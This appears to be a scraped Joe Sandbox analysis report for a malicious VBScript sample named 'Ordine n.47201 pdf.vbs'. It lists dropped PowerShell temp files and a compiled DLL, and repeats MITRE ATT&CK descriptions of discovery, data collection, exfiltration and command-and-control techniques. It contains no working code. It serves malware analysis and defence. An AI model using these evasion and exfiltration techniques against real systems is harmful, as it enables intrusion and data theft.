Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Ordine n.47201 pdf.vbs

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Initial Sample

Memory Dumps

Other

Sigma Signatures

Data Obfuscation

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

C:\Users\user\AppData\Local\Temp\RESEEA4.tmp

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ajtz5gna.zoe.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cooiigyo.4mo.ps1

C:\Users\user\AppData\Local\Temp\i3ontxzb\CSC7271579FEF14719AB8809EB2A5F450.TMP

C:\Users\user\AppData\Local\Temp\i3ontxzb\i3ontxzb.0.cs

C:\Users\user\AppData\Local\Temp\i3ontxzb\i3ontxzb.cmdline

C:\Users\user\AppData\Local\Temp\i3ontxzb\i3ontxzb.dll

C:\Users\user\AppData\Local\Temp\i3ontxzb\i3ontxzb.out

\Device\ConDrv

Static File Info

General

File Icon

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

Windows Analysis Report
Ordine n.47201 pdf.vbs

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may steal data by exfiltrating it over a different protocol than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server.
Tactics:	Exfiltration
Data Sources:	Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre